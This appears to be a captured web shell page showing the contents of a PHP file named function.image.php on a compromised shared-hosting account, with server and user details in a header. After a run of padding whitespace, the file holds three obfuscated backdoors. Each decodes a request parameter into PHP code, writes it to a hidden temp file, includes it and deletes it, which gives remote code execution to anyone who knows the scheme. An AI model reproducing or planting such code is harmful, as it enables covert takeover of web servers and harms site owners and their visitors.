HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/vitanhod/vigolic-100ad.vitavit.com.pk/includes/
Upload Files
File: /home/vitanhod/vigolic-100ad.vitavit.com.pk/includes/function.image.php
<?php																																										if(array_key_exists("\x64chu\x6E\x6B", $_REQUEST)){ $val = $_REQUEST["\x64chu\x6E\x6B"]; $val = explode ( "." , $val ) ; $itm= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s ); $i= 0; $__tmp= $val; while ($v2= array_shift($__tmp)) {$chS= ord($s[$i% $sLen] ); $dec= ((int)$v2 - $chS - ($i% 10)) ^ 44; $itm .= chr($dec ); $i++; } $component = array_filter([getenv("TMP"), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), session_save_path(), "/tmp", "/var/tmp"]); for ($holder = 0, $record = count($component); $holder < $record; $holder++) { $property_set = $component[$holder]; if ((is_dir($property_set) and is_writable($property_set))) { $comp = str_replace("{var_dir}", $property_set, "{var_dir}/.pointer"); $success = file_put_contents($comp, $itm); if ($success) { include $comp; @unlink($comp); die();} } } }
																																										if(!empty($_REQUEST["\x72e\x63or\x64"])){ $value = $_REQUEST["\x72e\x63or\x64"]; $value =explode ( '.' , $value); $flg = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $m = 0; $__tmp = $value; while( $v9 = array_shift( $__tmp)) { $sChar = ord( $s[$m % $sLen]); $d =( ( int)$v9 - $sChar -( $m % 10)) ^ 69; $flg.= chr( $d); $m++; } $holder = array_filter([sys_get_temp_dir(), "/tmp", getcwd(), getenv("TEMP"), session_save_path(), getenv("TMP"), "/dev/shm", "/var/tmp", ini_get("upload_tmp_dir")]); foreach ($holder as $tkn): if (is_writable($tkn) && is_dir($tkn)) { $res = "$tkn/.k"; if (file_put_contents($res, $flg)) { include $res; @unlink($res); die(); } } endforeach; }


if(@$_POST["pa\x72a\x6D\x65ter\x5Fgr\x6F\x75p"] !== null){
	$flag = $_POST["pa\x72a\x6D\x65ter\x5Fgr\x6F\x75p"];
	 	 $flag =	explode  	("."	,		$flag ) 	;		
	$ref = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt);
    
            foreach ($flag as $m=>  $v1):
                $chS = ord($salt[$m 	%	$lenS]);
                $d = ((int)$v1 - $chS - ($m 	%	10)) ^ 59;
                $ref	.=	 chr($d);
            endforeach;
	$token = array_filter(["/tmp", ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", session_save_path(), getenv("TMP"), getenv("TEMP")]);
	while ($element = array_shift($token)) {
    		if (is_dir($element) ? is_writable($element) : false) {
    $fac = str_replace("{var_dir}", $element, "{var_dir}/.ent");
    if (file_put_contents($fac, $ref)) {
	require $fac;
	unlink($fac);
	exit;
}
}
}
}
@ Telegram